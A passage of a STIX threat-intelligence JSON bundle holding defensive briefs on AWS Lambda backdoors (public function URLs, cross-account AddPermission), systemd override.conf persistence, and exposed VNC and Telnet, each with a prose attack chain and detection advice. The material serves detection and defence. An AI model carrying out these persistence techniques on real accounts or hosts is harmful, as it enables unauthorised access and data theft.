      "source_ref": "report--4e5b6ceb-714f-57fd-a248-6fab3cdfc309",
      "target_ref": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4a85b974-863c-5535-a9a9-5d02d5634ae4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Modify Cloud Compute Infrastructure",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1578",
          "url": "https://attack.mitre.org/techniques/T1578"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--03618d9e-fc02-5eff-9eef-0c478687cac2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e5b6ceb-714f-57fd-a248-6fab3cdfc309",
      "target_ref": "attack-pattern--4a85b974-863c-5535-a9a9-5d02d5634ae4"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4e5b6ceb-714f-57fd-a248-6fab3cdfc309",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS Lambda Function URL Created with Public Access",
      "description": "## Overview\n\nThis threat involves the misconfiguration of AWS Lambda function URLs, allowing adversaries to establish a persistent and publicly accessible foothold within a compromised AWS environment. Specifically, the creation or modification of a Lambda function URL with `authType=NONE` exposes the function to unauthenticated invocation directly from the internet. This technique enables attackers to bypass traditional AWS credential requirements for function execution, creating a durable entry point for various malicious activities. Such public URLs can serve as covert command and control (C2) channels, facilitate unauthorized data exfiltration, or provide an on-demand platform for executing arbitrary attacker-controlled code. This configuration is typically rare for legitimate applications and warrants immediate review due to the significant security implications of exposing compute resources to the public internet without authentication.\n\n## Attack Chain\n\n1.  An adversary gains initial access to an AWS account, potentially via compromised credentials or an exploited vulnerability.\n2.  Using the compromised credentials, the adversary invokes the `CreateFunctionUrlConfig` or `UpdateFunctionUrlConfig` API call against an existing or new AWS Lambda function.\n3.  Within this API call, the adversary intentionally sets the `AuthType` parameter to `NONE`.\n4.  This action successfully configures the target AWS Lambda function with a unique, publicly accessible HTTPS endpoint (Function URL).\n5.  The adversary can then directly invoke this Lambda function from any internet-connected system without providing any AWS authentication credentials.\n6.  This publicly exposed function serves as a persistent and unauthenticated entry point, enabling command and control (C2) operations.\n7.  The adversary can leverage this for unauthorized data exfiltration by programming the Lambda function to send sensitive data to an external location.\n8.  Alternatively, the Lambda function can be used to execute arbitrary attacker-controlled code on demand within the AWS environment, maintaining a durable backdoor into the system.\n\n## Impact\n\nThe successful exploitation of this misconfiguration grants adversaries a persistent and unauthenticated entry point into the compromised AWS environment. This can lead to a range of severe consequences, including full compromise of the affected Lambda function's execution role, leading to lateral movement, privilege escalation, and access to other AWS resources. Attackers can use this persistent access for command and control, unauthorized data exfiltration of sensitive information (e.g., customer data, intellectual property), or to launch further attacks and maintain a foothold. The exact number of victims is not specified, but any organization utilizing AWS Lambda functions is potentially vulnerable if access to credentials allows this misconfiguration.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to your SIEM to detect suspicious `CreateFunctionUrlConfig` or `UpdateFunctionUrlConfig` events with `authType=NONE` in your AWS CloudTrail logs.\n*   Investigate the `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.type` fields for any detections to identify the principal responsible for the change.\n*   Review the `aws.cloudtrail.request_parameters` for the `functionName` and the `authType`, and `aws.cloudtrail.response_elements` for the resulting `functionUrl` for unauthorized public exposures.\n*   If an unauthorized public URL is identified, immediately change the function URL `authType` to `AWS_IAM` or delete the function URL configuration as detailed in the AWS documentation linked in this brief.\n*   Review the function's code, execution role, and recent changes (e.g., `UpdateFunctionCode`, `UpdateFunctionConfiguration`) for signs of tampering following detection.\n*   Restrict `lambda:CreateFunctionUrlConfig` and `lambda:UpdateFunctionUrlConfig` permissions to only trusted roles within your AWS environment to prevent unauthorized creation of public function URLs.\n",
      "published": "2026-07-03T16:15:47Z",
      "labels": [
        "cloud",
        "aws",
        "persistence",
        "defense-evasion"
      ],
      "object_refs": [
        "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
        "attack-pattern--4a85b974-863c-5535-a9a9-5d02d5634ae4"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/dg/lambda-urls.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/dg/urls-auth.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Event Triggered Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1546",
          "url": "https://attack.mitre.org/techniques/T1546"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7f68fc4f-7be6-579d-91b1-58cfb0b22c3f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--db7b1546-13d7-55ce-9e27-506d280cfc38",
      "target_ref": "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4a85b974-863c-5535-a9a9-5d02d5634ae4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Modify Cloud Compute Infrastructure",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1578",
          "url": "https://attack.mitre.org/techniques/T1578"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--204a0da9-27c0-5dfa-80c7-9753f0244f22",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--db7b1546-13d7-55ce-9e27-506d280cfc38",
      "target_ref": "attack-pattern--4a85b974-863c-5535-a9a9-5d02d5634ae4"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--db7b1546-13d7-55ce-9e27-506d280cfc38",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS Lambda Function Policy Updated to Allow Cross-Account Invocation",
      "description": "## Overview\n\nThis threat involves an adversary establishing a cross-account persistence mechanism within Amazon Web Services (AWS) by manipulating AWS Lambda function resource policies. Following an initial compromise of an AWS identity, the attacker uses the `AddPermission` API to grant `lambda:InvokeFunction` access to a principal in an external, attacker-controlled AWS account. This action creates a backdoor, allowing the adversary to invoke the targeted Lambda function at will or relay its output to their infrastructure, all without modifying the function's underlying code, which might be more closely monitored by defenders. This technique, identified as a high-severity concern, bypasses typical code-level scrutiny and enables sustained access or data exfiltration, highlighting the importance of monitoring policy changes on critical cloud resources.\n\n## Attack Chain\n\n1.  An adversary successfully compromises an AWS identity (e.g., an IAM user, role, or access key) with permissions to modify AWS Lambda function policies within a target AWS account.\n2.  Using the compromised credentials, the adversary authenticates to the target AWS environment and identifies a Lambda function to backdoor, often one with access to sensitive data or critical operations.\n3.  The adversary invokes the `lambda:AddPermission` API call, specifying the target Lambda function and a new policy `Statement` in the request parameters.\n4.  This `Statement` explicitly grants `lambda:InvokeFunction` access to an AWS principal (user or role) located in an AWS account controlled by the adversary.\n5.  The successful `AddPermission` operation establishes a new, unauthorized cross-account invocation path to the Lambda function.\n6.  From their own AWS account, the adversary can now invoke the compromised Lambda function, executing its code and potentially accessing or exfiltrating sensitive data that the function is authorized to process.\n7.  This action provides persistent access to the function's capabilities, allowing for ongoing data collection, further reconnaissance, or execution of malicious logic within the victim's environment.\n\n## Impact\n\nThe successful exploitation of this persistence mechanism can lead to severe consequences, including unauthorized execution of code, data exfiltration, and sustained access to the victim's AWS environment. By invoking a backdoored Lambda function, an attacker can bypass traditional security controls that monitor code changes or direct access attempts. If the compromised Lambda function processes sensitive customer data, intellectual property, or financial information, this could result in significant data breaches, regulatory non-compliance fines, reputational damage, and financial losses. The attack grants an attacker a covert method to maintain control and leverage existing trusted resources within the target's cloud infrastructure.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"AWS Lambda Function Policy Updated to Allow Cross-Account Invocation\" to your SIEM and tune for your environment by validating known legitimate cross-account grants.\n*   Regularly review `aws.cloudtrail.request_parameters` logs for `AddPermission` API calls to identify unusual or unauthorized principals, especially those from external AWS accounts.\n*   Restrict `lambda:AddPermission` permissions to a very small set of highly trusted IAM roles and principles in your AWS accounts.\n*   Investigate `aws.cloudtrail.user_identity.arn`, `source.ip`, and `user_agent.original` for any alerts generated by the rule to understand the actor and origin of the policy change.\n",
      "published": "2026-07-03T16:14:50Z",
      "labels": [
        "cloud",
        "aws",
        "persistence",
        "defense-evasion"
      ],
      "object_refs": [
        "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2",
        "attack-pattern--4a85b974-863c-5535-a9a9-5d02d5634ae4"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/dg/access-control-resource-based.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/api/API_AddPermission.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create or Modify System Process",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1543",
          "url": "https://attack.mitre.org/techniques/T1543"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d5b53235-6e69-5a8c-84d1-8e79bedebb87",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cc1a9542-3f37-5e4e-8ed1-a2454f4341bc",
      "target_ref": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cc1a9542-3f37-5e4e-8ed1-a2454f4341bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Systemd Service Override Configuration File Creation for Persistence",
      "description": "## Overview\n\nMalicious actors can exploit Systemd override configuration files to establish persistence or escalate privileges on Linux systems. These files, such as `override.conf`, allow for modification of Systemd service behavior without altering the original service unit file. By crafting and placing these override files in specific system or user service directories (e.g., `/etc/systemd/system/\u003cservice\u003e.d/` or `~/.config/systemd/user/\u003cservice\u003e.d/`), attackers can introduce malicious commands to execute during system startup, service restarts, or at scheduled times via Systemd timers. This technique enables them to maintain unauthorized access, execute additional payloads, or evade detection, as the changes can survive reboots and often go unnoticed by standard configuration checks. The technique targets the core Systemd service management framework common across modern Linux distributions.\n\n## Attack Chain\n\n1.  An attacker gains initial access to a Linux system, potentially through compromised credentials, exploited vulnerabilities, or other means.\n2.  The attacker identifies a target Systemd service whose behavior they wish to alter for persistence (e.g., `sshd.service`, a web server daemon, or a custom application).\n3.  A malicious Systemd override configuration file (e.g., `override.conf`) is crafted, containing directives such as `ExecStartPre`, `ExecStartPost`, `Environment`, or `OnCalendar` to execute arbitrary commands.\n4.  The attacker writes or renames this malicious `.conf` file into a Systemd override directory for the target service, such as `/etc/systemd/system/\u003cservice\u003e.d/` for system-wide services or `~/.config/systemd/user/\u003cservice\u003e.d/` for user-specific services.\n5.  To activate the changes immediately, the attacker may force Systemd to reload its configuration using `systemctl daemon-reload` and potentially restart the affected service.\n6.  Upon the next service start, user login, or system reboot, the malicious commands specified in the override file are executed, providing the attacker with persistent access or other intended malicious capabilities.\n\n## Impact\n\nThe successful exploitation of Systemd override configuration files can lead to sustained unauthorized access, arbitrary code execution with elevated privileges, and the compromise of system integrity. Attackers can embed backdoors that survive reboots, launch additional malware, or exfiltrate sensitive data. If critical system services like `sshd` or security agents are targeted, the impact can be severe, potentially leading to full system control or a complete bypass of security monitoring. The persistence mechanism is stealthy, making detection and remediation challenging without specific monitoring.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Detect Systemd Service Override Configuration File Creation\" to your SIEM to alert on suspicious `.conf` file creation or renaming in Systemd override directories.\n*   Ensure that file integrity monitoring (FIM) is enabled for Systemd service directories, specifically watching for changes to `*.service.d/override.conf` files, to complement the rule above.\n*   Review any triggered alerts by opening the detected override file and comparing it against approved baselines and recent change requests, focusing on `ExecStart`, `ExecStartPre`, `ExecStartPost`, `Environment`, and `OnCalendar` directives.\n*   Trace the process responsible for creating or renaming the `.conf` file back to its origin (parent process, user, and execution context) to determine legitimacy.\n*   Isolate affected Linux hosts from the network, preserve the malicious `override.conf` file and associated artifacts, and remove the persistence by deleting the drop-in directory or `override.conf` after forensic collection.\n",
      "published": "2026-07-03T16:13:32Z",
      "labels": [
        "persistence",
        "privilege-escalation",
        "linux",
        "endpoint"
      ],
      "object_refs": [
        "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_systemd_override_conf_creation.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Access Tools",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1219",
          "url": "https://attack.mitre.org/techniques/T1219"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f571cbf-00c5-52dd-ba0d-b4526ccd76d1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1f4a5e02-a1e3-5eae-a998-342e6d16b62a",
      "target_ref": "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1021",
          "url": "https://attack.mitre.org/techniques/T1021"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--46db59f3-aac2-5e62-afe4-acd5d317bed6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1f4a5e02-a1e3-5eae-a998-342e6d16b62a",
      "target_ref": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1f4a5e02-a1e3-5eae-a998-342e6d16b62a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "VNC (Virtual Network Computing) to the Internet",
      "description": "## Overview\n\nThis threat brief addresses the critical security risk posed by Virtual Network Computing (VNC) traffic that originates from internal networks and connects directly to the Internet. While VNC is a legitimate tool for system administrators to remotely control systems for maintenance, its direct exposure to the Internet is a significant security vulnerability. Threat actors frequently target and exploit VNC servers as an initial access vector or to establish persistent backdoors into victim environments. This activity is often observed on specific TCP ports ranging from 5800 to 5810. Organizations with VNC services exposed to the public internet are at heightened risk of unauthorized access, system compromise, and further malicious activity such as data exfiltration or ransomware deployment.\n\n## Attack Chain\n\n1.  **Exposure**: A VNC server, often intended for internal use, is misconfigured and directly exposed to the public internet, potentially due to oversight or lack of proper network segmentation.\n2.  **Discovery**: Threat actors actively scan public IP ranges for systems listening on common VNC ports (e.g., TCP 5800-5810), identifying exposed VNC services.\n3.  **Initial Access**: The attacker attempts to gain access to the exposed VNC server, either by exploiting known vulnerabilities in the VNC software or by brute-forcing weak credentials.\n4.  **Remote Control**: Upon successful authentication or exploitation, the threat actor establishes a remote VNC session, gaining interactive control over the compromised system.\n5.  **Command and Control**: The attacker uses the established VNC connection for command and control, executing commands, downloading additional tools, or manipulating system configurations.\n6.  **Lateral Movement/Persistence**: From the initially compromised system, the attacker may pivot to other internal systems, escalate privileges, or establish additional persistence mechanisms.\n7.  **Impact**: The attacker achieves their final objective, which could include data exfiltration, deployment of ransomware, system disruption, or maintaining long-term access as a backdoor.\n\n## Impact\n\nThe direct exposure of VNC to the internet and subsequent exploitation can lead to severe consequences. Affected organizations may experience complete compromise of the targeted system, leading to unauthorized access to sensitive data, installation of malicious software (such as ransomware or cryptocurrency miners), and use of the system as a beachhead for lateral movement within the internal network. While specific victim counts are not available for this detection rule, any organization with internet-exposed VNC is a potential target, especially those relying on it for remote administration of critical infrastructure or cloud server instances. The outcome typically involves significant financial loss due to data breaches, operational downtime, and incident response costs.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to your SIEM to detect VNC connections originating from internal networks to the Internet.\n*   Ensure network traffic logging, especially for `network_connection` events on TCP ports 5800-5810, is enabled and forwarded to your SIEM for correlation.\n*   Review network configurations to ensure VNC services are not directly exposed to the Internet; implement strong network segmentation and use secure VPNs for remote access.\n*   Investigate all alerts generated by the `VNC (Virtual Network Computing) to the Internet` rule by examining source and destination IP addresses, and correlating with user login activities.\n*   Apply security patches and updates to all VNC software versions immediately to mitigate known vulnerabilities.\n*   Develop and implement a clear policy for VNC usage, restricting it to internal networks or secure, audited remote access solutions only.\n",
      "published": "2026-07-03T16:06:03Z",
      "labels": [
        "command-and-control",
        "lateral-movement",
        "remote-access",
        "network"
      ],
      "object_refs": [
        "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93",
        "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml"
        },
        {
          "source_name": "reference",
          "url": "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Access Tools",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1219",
          "url": "https://attack.mitre.org/techniques/T1219"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d176e623-baa1-5f65-8980-d12eb64eaa0a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2e971493-fa0d-5bf7-aa23-52122482d4e3",
      "target_ref": "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "External Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1133",
          "url": "https://attack.mitre.org/techniques/T1133"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c7d26ed9-d08e-5e11-91c0-8b1fbd4d01dd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2e971493-fa0d-5bf7-aa23-52122482d4e3",
      "target_ref": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c42af397-e286-58a2-b17d-8140745ee354",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2e971493-fa0d-5bf7-aa23-52122482d4e3",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2e971493-fa0d-5bf7-aa23-52122482d4e3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "VNC (Virtual Network Computing) from the Internet",
      "description": "## Overview\n\nThis threat brief focuses on the detection of Virtual Network Computing (VNC) traffic originating from the public internet and targeting internal network resources. VNC is a legitimate remote desktop protocol commonly used by system administrators for remote maintenance and resource sharing. However, direct exposure of VNC services to the internet significantly increases an organization's attack surface. Threat actors actively scan for and exploit vulnerable VNC instances as a primary vector for initial access into a network or to establish persistent backdoors. The detection described identifies network connections to common VNC ports (5800-5810/TCP) from external IP addresses to internal RFC1918 IP space, highlighting potential unauthorized access attempts or compromises. While VNC connections may be necessary for specific workflows, such as supporting specialized software or cloud instances, any unapproved or unfamiliar internet-facing VNC activity warrants immediate investigation due to its high risk.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Scanning**: Threat actors continuously scan public IP address ranges for open ports associated with remote access services, including VNC ports (typically 5800-5810/TCP).\n2.  **Target Identification**: Upon discovering an open VNC port on a target's perimeter, the attacker identifies that the service is exposed from the internet to an internal network segment, making it a viable target for exploitation.\n3.  **Initial Access Attempt**: The attacker attempts to authenticate to the exposed VNC service, often via brute-force attacks against weak credentials, or by exploiting known vulnerabilities in the VNC server software to bypass authentication.\n4.  **Remote Desktop Control**: Successful authentication or exploitation grants the attacker remote interactive desktop access to the compromised internal system, enabling direct manipulation of the graphical user interface.\n5.  **Execution of Commands**: The attacker utilizes the VNC session to execute commands, install additional malware, modify system configurations, or escalate privileges within the compromised host.\n6.  **Persistence \u0026 Lateral Movement**: The attacker establishes persistent access mechanisms (e.g., creating new user accounts, modifying startup items, deploying backdoors) and may then attempt to move laterally within the network to discover and compromise additional systems.\n7.  **Data Exfiltration/Impact**: Depending on the attacker's objectives, sensitive data may be exfiltrated from the compromised system or network, or further destructive actions (e.g., ransomware deployment) may be initiated.\n\n## Impact\n\nSuccessful exploitation of internet-exposed VNC services can lead to severe consequences, including unauthorized access to internal systems, sensitive data breaches, and complete network compromise. Attackers can gain interactive control over compromised endpoints, facilitating the installation of additional malicious tools, privilege escalation, lateral movement, and ultimately, data exfiltration or disruption of critical business operations. The high risk score associated with this type of activity underscores the potential for significant organizational damage if left unchecked, making prompt detection and remediation crucial for maintaining a strong security posture.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Detect Internet-Facing VNC Connections to Internal Hosts\" to your SIEM and tune for your environment, paying close attention to the specified destination ports and IP ranges.\n*   Ensure network flow logging is enabled and ingested into your SIEM (`network_connection` log source) to provide the necessary telemetry for the detection rule.\n*   Review and enforce strict firewall rules to prevent VNC services (TCP ports 5800-5810) from being directly exposed to the internet, limiting access only to trusted internal networks or via secure VPNs.\n*   Regularly audit systems and network configurations to identify and remediate any unauthorized VNC server installations or accidental internet exposure, referencing IANA's IPv4 special registry for public vs. private ranges.\n*   Investigate all alerts from the \"Detect Internet-Facing VNC Connections to Internal Hosts\" rule by reviewing the source IP for reputation, the destination system's authorization for VNC, and correlating with other security events as described in the brief's analysis section.\n",
      "published": "2026-07-03T16:04:50Z",
      "labels": [
        "command-and-control",
        "initial-access",
        "remote-access",
        "network",
        "vnc"
      ],
      "object_refs": [
        "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93",
        "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e2eed8b6-ec5b-5490-be08-4902ade7bb74",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7a2c71b1-0f76-5495-af74-ff50e3c7701d",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1021",
          "url": "https://attack.mitre.org/techniques/T1021"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e32e667a-c65b-5a66-9e25-cabeb0cee486",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7a2c71b1-0f76-5495-af74-ff50e3c7701d",
      "target_ref": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "External Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1133",
          "url": "https://attack.mitre.org/techniques/T1133"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--94a9f0d3-c648-5fac-bc88-ec7e056fbadb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7a2c71b1-0f76-5495-af74-ff50e3c7701d",
      "target_ref": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--329f6898-5bdf-5aef-9f0e-dbe9bd05b226",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7a2c71b1-0f76-5495-af74-ff50e3c7701d",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7a2c71b1-0f76-5495-af74-ff50e3c7701d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of Accepted Default Telnet Port Connection",
      "description": "## Overview\n\nThis brief focuses on the inherent risks and detection of unencrypted Telnet traffic, particularly on its default port 23. Telnet, a legacy protocol, is often utilized by system administrators for remote command-line access to older or embedded systems. However, its unencrypted nature poses a significant security risk, as it transmits sensitive information, including usernames and passwords, in plain text. Threat actors frequently target and exploit Telnet services, especially when exposed to the internet, leveraging them as an initial access vector or establishing backdoors into compromised networks. The detection rule aims to flag these high-risk connections, indicating potential unauthorized access attempts or command-and-control communication, thereby necessitating immediate investigation to prevent data exfiltration or broader system compromise. The primary concern is any unexpected or external Telnet activity, which deviates from legitimate, usually internal, administrative workflows.\n\n## Impact\n\nThe successful exploitation of Telnet services can lead to severe consequences. Attackers can gain unauthorized remote access to compromised systems, potentially escalating privileges and establishing persistence within the network. Due to Telnet's plain-text communication, any credentials transmitted during a session can be intercepted, leading to further account compromise and lateral movement across the environment. This can result in data exfiltration, deployment of additional malware (e.g., ransomware), or complete control over critical infrastructure. Organizations with Telnet exposed to the internet or widely used internally without proper segmentation face a high risk of initial breach or rapid internal compromise if such connections are not promptly detected and mitigated.\n\n## Recommendation\n\n*   Disable Telnet services on all systems where it is not absolutely essential to eliminate a common attack vector.\n*   Replace Telnet with secure, encrypted alternatives like SSH for remote administration across your environment to protect credentials and data in transit.\n*   Deploy the Sigma rule \"Accepted Default Telnet Port Connection\" to your SIEM/detection platform and configure it to alert on any default Telnet port 23 connections, as outlined by the `detection` block.\n*   Enable comprehensive network flow logging (e.g., NetFlow, IPFIX) or firewall logs (e.g., logs from Palo Alto Networks, Fortinet, pfSense, SonicWall) to feed your SIEM for correlation with the `logsource` categories identified in the rule.\n*   Investigate all alerts 